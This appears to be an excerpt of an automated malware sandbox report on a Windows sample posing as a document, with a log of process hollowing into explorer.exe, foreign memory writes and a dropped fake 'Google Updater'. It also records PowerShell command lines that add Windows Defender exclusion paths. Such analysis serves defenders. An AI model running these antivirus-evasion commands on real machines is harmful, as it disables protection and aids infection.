Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: E0000

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 47881F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3CA81F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 43081F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3C481F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3C081F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 38781F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3F081F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 40081F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3D081F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 41981F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 45A81F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 41381F3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: unknown unknown
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: unknown unknown

Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: DownloadVersionListSoftware\Microsoft\Internet Explorer\VersionManager%LOCALAPPDATA%\Microsoft\Internet Explorer\VersionManager\versionlist.xml11.0Shell_TrayWnd%s\%sNT AUTHORITYSYSTEM\mscoree.dllrunasopenCreateProcessInternalWntdll.dll/%sSOFTWARE\Microsoft\NET Framework Setup\NDP ,, jarfile\shell\open\commandSYSTEM\CurrentControlSetZwMapUserPhysicalPagesScatterZwWow64CallFunction64ZwWaitHighEventPairbf'J&';qyy4RpaTqqg\{szPmBbf'J&';qyy4RpaTqqg\{szBfsvJzf;qyy4Fsv\fS\|ypEgzapvapqzyp&';qyy4F]Vgptap\apxSgzxEtgf\|{r[txp{vglea;qyy4FfyP{vgleaEtv~pafpv`g&';qyy4P{vgleaXpfftrpb\|{ag`fa;qyy4B\|{Cpg\|slAg`fa{pate\|&';qyy4[pa@fpgRpa\{sz`gyxz{;qyy4@GYQzb{yztqAzS\|ypB`gyxz{;qyy4Zwat\|{@fpgTrp{aFag\|{rvzxvay&';qyy4Atf~Q\|tyzr\{q\|gpvatqcte\|&';qyy4VgptapEgzvpffB\|a}Az~p{B`fpg&';qyy4V}t{rpB\|{qzbXpfftrpS\|yapg~pg{py&';qyy4@eqtapEgzvA}gptqTaag\|w`ap~pg{py&';qyy4\{\|a\|ty\|opEgzvA}gptqTaag\|w`apY\|fa~pg{py&';qyy4VgptapEgzvpff\{apg{tyB~pg{py&';qyy4RpaA}gptq\q~pg{py&';qyy4RpaXteepqS\|yp[txpB~pg{py&';qyy4RpaEgzq`va\{sz{aqyy;qyy4GayD`pglPypcta\|z{Sytrf{aqyy;qyy4bvffag{aqyy;qyy4xpxvel{aqyy;qyy4xpxfpa{aqyy;qyy4GayFpaP{c\|gz{xp{aCtg\|twyp{aqyy;qyy4GayD`pglP{c\|gz{xp{aCtg\|twypJ@{aqyy;qyy4GayD`pglP{c\|gz{xp{aCtg\|twyp{aqyy;qyy4GayFpaP{c\|gz{xp{aCtg{aqyy;qyy4QwrWgpt~Ez\|{a{aqyy;qyy4Qwr@\|RpaA}gptqQpw`rZw
Source: CpSHySoEfzH.exe, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,MultiByteToWideChar,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,MultiByteToWideChar,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: EnumSystemLocalesA,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: GetLocaleInfoA,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: GetLocaleInfoW,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: EnumSystemLocalesA,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: GetLocaleInfoA,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: GetLocaleInfoA,
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\explorer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\Windows\SysWOW64\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\Windows\SysWOW64\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
